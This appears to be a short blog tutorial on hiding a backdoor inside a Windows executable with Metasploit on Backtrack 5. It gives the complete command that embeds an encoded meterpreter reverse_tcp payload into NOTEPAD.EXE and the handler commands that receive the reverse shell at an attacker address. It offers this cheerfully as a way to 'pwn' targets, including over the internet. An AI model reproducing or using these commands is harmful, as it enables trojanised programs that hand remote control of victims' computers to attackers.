How to Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps, have you imagine when you click and open your notepad application it contain backdoor or malicious codes? or when you start your windows o.s it also start explorer.exe services, but this explorer.exe containing backdoor or malicious codes? Actually embedding backdoor into EXE files isn’t something hard to do, but it’s very easy.. you can follow the tutorial below to prove that I’m true it’s easy :p LoL 🙂
1. First of all you should prepare your target EXE file. In this case I will use NOTEPAD.EXE.
2. Next, we use msfpayload to inject a meterpreter reverse payload into our executable(NOTEPAD.EXE) and encoded it 5 times(5 iterations) using shikata_ga_nai and save the backdoored file into Desktop(all code below is in one line).
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
3. Because we selected reverse meterpreter payload, we need to setup the exploit handler to handle the connection back to our attacking machine. In this case attacker use IP address 192.168.8.92. Go to Metasploit console by typing msfconsole, and then run :
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.8.92 LHOST => 192.168.8.92 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit
Don’t forget to change LHOST with your own IP address and LPORT with your desired local port.
PWNED 🙂 You also can learn how to implement this method to attack over the internet, but please read my previous tutorial about the logic how to attack network outside LAN / Attack WAN. Hope you found it useful for you. any comment or correction?please drop your comment below 🙂